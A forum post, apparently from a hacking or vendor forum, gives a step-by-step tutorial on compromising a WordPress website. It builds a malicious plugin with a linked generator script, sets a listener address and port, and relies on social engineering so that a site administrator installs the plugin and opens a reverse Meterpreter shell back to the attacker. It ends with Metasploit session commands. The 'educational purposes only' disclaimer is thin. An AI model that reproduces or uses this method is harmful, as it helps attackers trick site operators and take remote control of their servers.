• ✨Always Use Forum Private Messages PM For Deal With Vendors✨

    Admin Contacts Jabber: megiddo@jabber.sk Telegram: @Megiddo1

Hacking WordPress WebSite

✨ DeeZNuTz

✨ Master ✨
Staff member
Joined
May 15, 2017
Messages
984
Likes
759
Points
1,045
Welcome back today we will talk about how we could compromise a WordPress website for a reverse meterpreter shell though use of malicious WordPress addons.

This will allow us to create a malicious WordPress plugin to use as a payload and achieve a reverse shell back to the attacking machine.


Requirements:

- Linux
- Python
- Metasploit
- malicious-wordpress-plugin


This tutorial is to show the threats of unknown plugins from rouge websites and social engineering methods. This tutorial is for educational purposes only the author of this guide will not be held responsible for misuse of this information.

First we will prepare malicious-wordpress-plugin this will allow us to generate a malicious WordPress plugin.


DOWNLOAD MALICIOUS-WORDPRESS-PLUGIN GENERATOR

https://github.com/wetw0rk/malicious-wordpress-plugin

Open up a new terminal and navigate to directory for malicious-wordpress-plugin script.

Screenshot-from-2017-04-11-17-18-03.png



You will now see the contents of the directory.

In a terminal navigate to the script directory and execute WordPress Zip Gen.

Use the following command to execute wordpress_zip_gen.py script.

Code:
python wordpress_zip_gen.py
Screenshot-from-2017-04-11-17-19-55.png



So that we can establish a reverse connection we will first need to know our what our local IP address is. We can find this by typing “ifconfig” from a terminal your LHOST will be found under inet.

Screenshot-from-2017-04-09-20-45-14-1.png



Usage:

Code:
python wordpress_zip_gen.py [LHOST] [LPORT]
Example:

Code:
python wordpress_zip_gen.py 192.168.43.49 443
wordpress_zip_gen will now generate a malicious WordPress addon and output it to the script directory.

Screenshot-from-2017-04-11-17-21-11.png



Screenshot-from-2017-04-11-17-23-06.png


Screenshot-from-2017-04-11-17-24-11-1.png



This attack will require a little social engineering/trickery to deliver the payload.

The malicious WordPress Plugin can be named what ever your like.

Upload the malicious WordPress Plugin to the WordPress test environment & active Plugin.

pluginzip.png



plugin2.png



plugin3.png



After the Admin or site operator installs the malicious WordPress Plugin you should now have established a reverse connection back to the attacking machine via a meterpreter shell.

To check if your shell sessions has been successful you can list established sessions using commands.

Listing sessions:
session -i

Connecting to a session:
session -i 1

Once a remote connection is established between the WordPress website and the attacking machine we can then use “help” command to list available operations. This will allow us to list exploits available for the target web server. We have now come to the end of this guide if you enjoyed this tutorial consider liking and sharing it on Social media thanks.
 
Top Bottom